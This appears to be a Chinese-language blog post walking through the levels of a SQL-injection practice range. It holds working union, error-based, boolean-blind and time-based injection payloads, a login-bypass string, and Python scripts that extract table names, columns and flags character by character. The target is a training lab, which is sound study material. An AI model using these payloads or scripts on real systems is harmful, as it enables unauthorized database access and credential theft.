<!DOCTYPE html><html lang="en" theme-mode="light"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><title>掌控安全打靶随记 | Vincent</title><link rel="icon" type="image/x-icon" href="/favicon.ico"><script>var config = {"root":"/","search":{"preload":"all","activeHolder":"Enter here","blurHolder":"Search","noResult":"Data \"$0\" not found"},"code":{"codeInfo":"$0 - $1 lines","copy":"copy","copyFinish":"copied","expand":"expand"}}</script><script src="//unpkg.com/valine/dist/Valine.min.js"></script><script src="//unpkg.com/mermaid@9.2.2/dist/mermaid.min.js"></script><link type="text/css" rel="stylesheet" href="//unpkg.com/lightgallery@2.7.1/css/lightgallery.css"><link type="text/css" rel="stylesheet" href="//unpkg.com/lightgallery@2.7.1/css/lg-zoom.css"><link type="text/css" rel="stylesheet" href="//unpkg.com/lightgallery@2.7.1/css/lg-thumbnail.css"><link type="text/css" rel="stylesheet" href="/lib/fontawesome/brands.min.css"><link type="text/css" rel="stylesheet" href="/lib/fontawesome/fontawesome.min.css"><link rel="stylesheet" href="/css/arknights.css"><script>if (window.localStorage.getItem('theme-mode') === 'light') document.documentElement.setAttribute('theme-mode', 'light')
if (window.localStorage.getItem('theme-mode') === 'dark') document.documentElement.setAttribute('theme-mode', 'dark')</script><style>@font-face {
 font-family: BenderLight;
 src: local('Bender'), url("/font/BenderLight.ttf");
}
@font-face {
 font-family: 'JetBrains Mono';
 src: local('JetBrains Mono'), url('/font/JetBrainsMono-Regular.woff2') format('woff2');
}
@font-face {
 font-family: 'Font Awesome 6 Brands';
 src: local('Font Awesome 6 Brands'), url('/lib/fontawesome/fa-brands.woff2') format('woff2');
}
@font-face {
 font-family: 'Font Awesome 6 Free';
 src: local('Font Awesome 6 Free'), url('/lib/fontawesome/fa-regular.woff2') format('woff2');
}</style><style>:root {
  --dark-background: url('https://cdnjson.com/images/2023/05/14/bg.jpg');
  --light-background: url('https://cdnjson.com/images/2023/05/14/bk.jpg');
}</style><meta name="generator" content="Hexo 6.3.0"></head><body><div class="loading" style="opacity: 0"><div class="loadingBar left"></div><div class="loadingBar right"></div></div><main><header class="closed"><nav><div class="navBtn hide"><i class="navBtnIcon"><span class="navBtnIconBar"></span><span class="navBtnIconBar"></span><span class="navBtnIconBar"></span></i></div><div class="navItem" id="search-header"><span class="navItemTitle"><input autocomplete="off" autocorrect="off" autocapitalize="none" placeholder="Search" spellcheck="false" maxlength="50" type="text" id="search-input"></span></div><div class="navItem" id="search-holder"></div><div class="search-popup"><div id="search-result"></div></div><ol class="navContent"><li class="navItem"><a class="navBlock" href="/"><span class="navItemTitle">Home</span></a></li><li class="navItem" matchdata="categories,tags"><a class="navBlock" href="/archives/"><span class="navItemTitle">Archives</span></a></li><li class="navItem"><a class="navBlock" href="/about/"><span class="navItemTitle">About</span></a></li></ol></nav></header><article><div id="post-bg"><div id="post-title"><h1>掌控安全打靶随记</h1><div id="post-info"><span>First Post: <div class="control"><time datetime="2023-06-11T08:24:50.000Z" id="date"> 2023-06-11</time></div></span><br><span>Last Update: <div class="control"><time datetime="2023-06-23T09:35:30.232Z" id="updated"> 2023-06-23</time></div></span></div></div><hr><div id="post-content"><p>这篇文章的靶场是掌控安全的sql注入靶场</p>
<span id="more"></span>

<p>靶场地址：<a target="_blank" rel="noopener" href="http://injectx1.lab.aqlab.cn/">http://injectx1.lab.aqlab.cn/</a></p>
<h1 id="Pass1-Pass4"><a href="#Pass1-Pass4" class="headerlink" title="Pass1-Pass4"></a>Pass1-Pass4</h1><p>pass1-4几乎没有区别，</p>
<p>就是闭合变了</p>
<p>且都是简单的字符型注入</p>
<p>这里就放一个的url构造：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">?id=1 order by 3<br><br>?id=1 and 1=2 union select 1,2,3<br><br>?id=1 and 1=2 union select 1,2,database() --&gt; error<br><br>?id=1 and 1=2 union select 1,2,group_concat(table_name)<br> from information_schema.tables where table_schema=&#x27;error&#x27; --&gt; error_flag,user<br><br>?id=1 and 1=2 union select 1,2,group_concat(column_name)<br> from information_schema.columns where table_schema=&#x27;error&#x27; and table_name=&#x27;user&#x27; --&gt; Id,username,password<br><br>?id=1 and 1=2 union select 1,2,group_concat(Id,username,password) from user<br></code></pre></td></tr></table></figure>

<p>后面的略</p>
<h1 id="Pass10-Pass11"><a href="#Pass10-Pass11" class="headerlink" title="Pass10-Pass11"></a>Pass10-Pass11</h1><p>布尔盲注，需要脚本爆破，随便写了一个</p>
<p>首先先手动二分法试一下数据库的长度</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">import</span> requests<br><span class="hljs-keyword">import</span> time<br><br>url = <span class="hljs-string">&#x27;http://injectx1.lab.aqlab.cn/Pass-10/index.php?id=1&#x27;</span><br><br>database = <span class="hljs-string">&#x27;&#x27;</span><br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">check</span>(<span class="hljs-params">url</span>):<br>    res = requests.get(url)<br>    <span class="hljs-keyword">if</span> res.status_code != <span class="hljs-number">200</span>:<br>        <span class="hljs-built_in">print</span>(<span class="hljs-string">&#x27;\n\n-----failed------\n\n&#x27;</span>)<br>    <span class="hljs-keyword">if</span> <span class="hljs-string">&#x27;有数据&#x27;</span> <span class="hljs-keyword">in</span> res.text:<br>        <span class="hljs-keyword">return</span> <span class="hljs-literal">True</span><br>    <span class="hljs-keyword">else</span>:<br>        <span class="hljs-keyword">return</span> <span class="hljs-literal">False</span><br><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">1</span>,<span class="hljs-number">13</span>):<br>    <span class="hljs-keyword">for</span> j <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">65</span>,<span class="hljs-number">123</span>):<br>        temp = url + <span class="hljs-string">f&#x27; and ascii(substr(database(),<span class="hljs-subst">&#123;i&#125;</span>,1))=<span class="hljs-subst">&#123;j&#125;</span>&#x27;</span><br>        <span class="hljs-keyword">if</span> check(temp):<br>            database += <span class="hljs-built_in">chr</span>(j)<br>            <span class="hljs-built_in">print</span>(database)<br>        <span class="hljs-keyword">else</span>:<br>            <span class="hljs-keyword">pass</span><br>        time.sleep(<span class="hljs-number">0.1</span>)<br></code></pre></td></tr></table></figure>



<p>库名：kanwolongxia</p>
<p>（这一步其实可以省略，只是我忘记了）</p>
<p>继续爆破列名,</p>
<p>首先先手动二分法试一下表名的长度</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">import</span> requests<br><span class="hljs-keyword">import</span> time<br><br>url = <span class="hljs-string">&#x27;http://injectx1.lab.aqlab.cn/Pass-10/index.php?id=1&#x27;</span><br><br>table = <span class="hljs-string">&#x27;&#x27;</span><br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">check</span>(<span class="hljs-params">url</span>):<br>    res = requests.get(url)<br>    <span class="hljs-keyword">if</span> res.status_code != <span class="hljs-number">200</span>:<br>        <span class="hljs-built_in">print</span>(<span class="hljs-string">&#x27;\n\n-----failed------\n\n&#x27;</span>)<br>    <span class="hljs-keyword">if</span> <span class="hljs-string">&#x27;有数据&#x27;</span> <span class="hljs-keyword">in</span> res.text:<br>        <span class="hljs-keyword">return</span> <span class="hljs-literal">True</span><br>    <span class="hljs-keyword">else</span>:<br>        <span class="hljs-keyword">return</span> <span class="hljs-literal">False</span><br><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">1</span>,<span class="hljs-number">17</span>):<br>    <span class="hljs-keyword">for</span> j <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">44</span>,<span class="hljs-number">123</span>):<br>        <span class="hljs-keyword">if</span> j &lt; <span class="hljs-number">65</span> <span class="hljs-keyword">and</span> j != <span class="hljs-number">44</span>:<br>            <span class="hljs-keyword">continue</span> <br>        temp = url + <span class="hljs-string">f&#x27;  and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),<span class="hljs-subst">&#123;i&#125;</span>,1))=<span class="hljs-subst">&#123;j&#125;</span>&#x27;</span><br>        <span class="hljs-keyword">if</span> check(temp):<br>            table += <span class="hljs-built_in">chr</span>(j)<br>            <span class="hljs-built_in">print</span>(table)<br>        <span class="hljs-keyword">else</span>:<br>            <span class="hljs-keyword">pass</span><br></code></pre></td></tr></table></figure>

<p>表名：loflag,news,user</p>
<p>这里挑选loflag</p>
<p>然后爆破列名，首先爆破一下长度</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">?id=1 and length((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=&#x27;loflag&#x27;)) = 9<br></code></pre></td></tr></table></figure>

<p>长度为9</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">import</span> requests<br><span class="hljs-keyword">import</span> time<br><br>url = <span class="hljs-string">&#x27;http://injectx1.lab.aqlab.cn/Pass-10/index.php?id=1&#x27;</span><br><br>column = <span class="hljs-string">&#x27;&#x27;</span><br><br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">check</span>(<span class="hljs-params">url</span>):<br>    res = requests.get(url)<br>    <span class="hljs-keyword">if</span> res.status_code != <span class="hljs-number">200</span>:<br>        <span class="hljs-built_in">print</span>(<span class="hljs-string">&#x27;\n\n-----failed------\n\n&#x27;</span>)<br>    <span class="hljs-keyword">if</span> <span class="hljs-string">&#x27;有数据&#x27;</span> <span class="hljs-keyword">in</span> res.text:<br>        <span class="hljs-keyword">return</span> <span class="hljs-literal">True</span><br>    <span class="hljs-keyword">else</span>:<br>        <span class="hljs-keyword">return</span> <span class="hljs-literal">False</span><br><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">1</span>,<span class="hljs-number">10</span>):<br>    <span class="hljs-keyword">for</span> j <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">44</span>,<span class="hljs-number">123</span>):<br>        <span class="hljs-keyword">if</span> j &lt; <span class="hljs-number">65</span> <span class="hljs-keyword">and</span> j != <span class="hljs-number">44</span>:<br>            <span class="hljs-keyword">continue</span> <br>        temp = url + <span class="hljs-string">f&quot; and ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=&#x27;loflag&#x27;),<span class="hljs-subst">&#123;i&#125;</span>,1))=<span class="hljs-subst">&#123;j&#125;</span>&quot;</span><br>        <span class="hljs-keyword">if</span> check(temp):<br>            column += <span class="hljs-built_in">chr</span>(j)<br>            <span class="hljs-built_in">print</span>(column)<br>        <span class="hljs-keyword">else</span>:<br>            <span class="hljs-keyword">pass</span><br></code></pre></td></tr></table></figure>

<p>列名：Id,flaglo</p>
<p>试出flaglo长度为55</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">?id=1 and length((select group_concat(flaglo) from loflag))=55<br></code></pre></td></tr></table></figure>

<p>开始爆破key</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">import</span> requests<br><br>url = <span class="hljs-string">&#x27;http://injectx1.lab.aqlab.cn/Pass-10/index.php?id=1&#x27;</span><br><br>content = <span class="hljs-string">&#x27;&#x27;</span><br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">check</span>(<span class="hljs-params">url</span>):<br>    res = requests.get(url)<br>    <span class="hljs-keyword">if</span> res.status_code != <span class="hljs-number">200</span>:<br>        <span class="hljs-built_in">print</span>(<span class="hljs-string">&#x27;\n\n-----failed------\n\n&#x27;</span>)<br>    <span class="hljs-keyword">if</span> <span class="hljs-string">&#x27;有数据&#x27;</span> <span class="hljs-keyword">in</span> res.text:<br>        <span class="hljs-keyword">return</span> <span class="hljs-literal">True</span><br>    <span class="hljs-keyword">else</span>:<br>        <span class="hljs-keyword">return</span> <span class="hljs-literal">False</span><br><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">1</span>,<span class="hljs-number">56</span>):<br>    <span class="hljs-keyword">for</span> j <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">44</span>,<span class="hljs-number">123</span>):<br>        <span class="hljs-keyword">if</span> j &lt; <span class="hljs-number">65</span> <span class="hljs-keyword">and</span> j != <span class="hljs-number">44</span>:<br>            <span class="hljs-keyword">continue</span> <br>        temp = url + <span class="hljs-string">f&quot; and ascii(substr((select group_concat(flaglo) from loflag),<span class="hljs-subst">&#123;i&#125;</span>,1))=<span class="hljs-subst">&#123;j&#125;</span>&quot;</span><br>        <span class="hljs-keyword">if</span> check(temp):<br>            content += <span class="hljs-built_in">chr</span>(j)<br>            <span class="hljs-built_in">print</span>(content)<br>        <span class="hljs-keyword">else</span>:<br>            <span class="hljs-keyword">pass</span><br></code></pre></td></tr></table></figure>

<p>得到key：zKaQQQQ,zKaQRD,zKaQMoren,zKaQtimehj,zKaQtimezxxz</p>


<p>pass11就是闭合变了，其他和pass10一样</p>
<h1 id="Pass5-Pass6-Pass12"><a href="#Pass5-Pass6-Pass12" class="headerlink" title="Pass5-Pass6,Pass12"></a>Pass5-Pass6,Pass12</h1><p>登录界面，post注入</p>
<p>首先尝试万能密码：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">admin&#x27; or 1=1#<br></code></pre></td></tr></table></figure>

<p>成功登录，接下来就简单了，</p>
<p>就是在这里简单的union字符型注入了</p>
<p>打开burpsuite抓个包：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">username=admin&amp;password=admin&amp;submit=%E7%99%BB%E5%BD%95<br></code></pre></td></tr></table></figure>

<p>字段数：3</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">username=admin&#x27; order by 3#&amp;password=admin&amp;submit=%E7%99%BB%E5%BD%95<br></code></pre></td></tr></table></figure>

<p>回显点：2，3</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">username=-admin&#x27; union select 1,2,3#&amp;password=admin&amp;submit=%E7%99%BB%E5%BD%95<br></code></pre></td></tr></table></figure>

<p>表名：flag,user</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">username=-admin&#x27; union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()#&amp;password=admin&amp;submit=%E7%99%BB%E5%BD%95<br></code></pre></td></tr></table></figure>

<p>列名：Id,flag</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">username=-admin&#x27; union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=&#x27;flag&#x27;#&amp;password=admin&amp;submit=%E7%99%BB%E5%BD%95<br></code></pre></td></tr></table></figure>

<p>全部数据：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">username=-admin&#x27; union select 1,2,group_concat(Id,&#x27;:&#x27;,flag) from flag#&amp;password=admin&amp;submit=%E7%99%BB%E5%BD%95<br></code></pre></td></tr></table></figure>



<p>pass12是布尔盲注。。。。。。</p>
<p>算了直接略吧。。。。</p>
<p>和上面pass10，11几乎一样</p>
<h1 id="Pass7-Pass9"><a href="#Pass7-Pass9" class="headerlink" title="Pass7-Pass9"></a>Pass7-Pass9</h1><p>ua注入，</p>
<p>直接在ua构造语句即可</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">&#x27; or extractvalue(1,concat(&#x27;~&#x27;,(database()))))#<br></code></pre></td></tr></table></figure>

<p>后面就是最简单的字符型注入步骤了，略</p>
<p>注意这一关必须要先弱口令登录成功之后才可以进行这一步操作，</p>
<p>不然会无法回显，可能不登陆成功需要盲注</p>
<p>后面的pass8，9分别是referer注入，xff注入，</p>
<p>构造语句完全一样</p>
<h1 id="pass13-pass14"><a href="#pass13-pass14" class="headerlink" title="pass13-pass14"></a>pass13-pass14</h1><p>时间盲注</p>
<p>界面的回显永远不会变，</p>
<p>没有报错没有界面不同，</p>
<p>前面的用不了了，</p>
<p>因此就是时间盲注，</p>
<p>主要payload：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">and if(length(database())=n,sleep(2),sleep(0))<br></code></pre></td></tr></table></figure>

<p>if判断的第一个参数就是需要布尔盲注的语句了，</p>
<p>结合上面的脚本改改就能过了，略</p>
<p>pass14就是闭合变了，其他一样</p>
<div id="paginator"></div></div><div id="post-footer"><div id="pages"><div class="footer-link" style="width: 50%;text-align:right;border-right:1px #fe2 solid"><a href="/2023/06/15/Sql%E6%B3%A8%E5%85%A5%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0-17/">← Next Sql注入学习笔记#17</a></div><div class="footer-link" style="width: 50%;right:1px;border-left:1px #fe2 solid"><a href="/2023/06/11/Sql%E6%B3%A8%E5%85%A5%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0-16/">Sql注入学习笔记#16 Prev →</a></div></div></div><div id="comments"><div class="selector"><button class="valine-sel"></button></div><div id="valine"></div></div></div><div class="bottom-btn"><div><a id="to-top" onClick="scrolls.scrolltop();" title="To Top" style="opacity: 0; display: none;">∧</a><a id="to-index" href="#toc-div" title="To Catalog">≡</a><a id="color-mode" onClick="colorMode.change()" title="Change Theme"></a></div></div></article><aside><div id="about"><a href="/" id="logo"><img src="./img/logo.jpg" alt="Logo"></a><h1 id="Dr"><a href="/">Vincent</a></h1><div id="description"><p>不与无谓人争气</p></div></div><div id="aside-block"><div id="toc-div"><h1>Catalog</h1><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#Pass1-Pass4"><span class="toc-number">1.</span> <span class="toc-text">Pass1-Pass4</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Pass10-Pass11"><span class="toc-number">2.</span> <span class="toc-text">Pass10-Pass11</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Pass5-Pass6-Pass12"><span class="toc-number">3.</span> <span class="toc-text">Pass5-Pass6,Pass12</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Pass7-Pass9"><span class="toc-number">4.</span> <span class="toc-text">Pass7-Pass9</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#pass13-pass14"><span class="toc-number">5.</span> <span class="toc-text">pass13-pass14</span></a></li></ol></div></div><footer><nobr>Published with <a target="_blank" rel="noopener" href="http://hexo.io">Hexo</a></nobr><wbr><nobr> Theme <a target="_blank" rel="noopener" href="https://github.com/Yue-plus/hexo-theme-arknights">Arknights</a></nobr><wbr><nobr>by <a target="_blank" rel="noopener" href="https://github.com/Yue-plus">Yue_plus</a></nobr></footer></aside></main><canvas id="canvas-dust"></canvas><script src="/js/search.js"></script><script src="/js/arknights.js"></script><script src="//unpkg.com/lightgallery@2.7.1/lightgallery.min.js"></script><script src="//unpkg.com/lightgallery@2.7.1/plugins/zoom/lg-zoom.min.js"></script><script src="//unpkg.com/lightgallery@2.7.1/plugins/thumbnail/lg-thumbnail.min.js"></script><script src="/js/pjax.js"></script><script class="pjax-js">reset= () => {new Valine({
 el: '#valine'
 , appId: 'HPascq2qxfVnEiu0BvuEltaD-gzGzoHsz'
 , appKey: 'AKHEZyHQcEOLkAQk07kDBYgN' , placeholder: 'This comment is sent by Penguin Logistics.'
 , path: window.location.pathname
});code.findCode();
document.querySelector('.lg-container')?.remove()
lightGallery(document.getElementById('post-bg'), {
  plugins: [lgZoom,lgThumbnail],
  selector: '.item-img'})}</script><script>window.addEventListener("load",() => {pjax = new Pjax({
 cacheBust: false,
 selectors: ['title','article','#aside-block','.pjax-js'],
 switches: {'article': Pjax.switches.sideBySide},
 switchesOptions: {
   'article': {
     classNames: {
       remove: "pjax-out",
       add: "pjax-in"
     }
   }
 }
});
document.addEventListener("pjax:complete", reset);reset()})</script></body></html>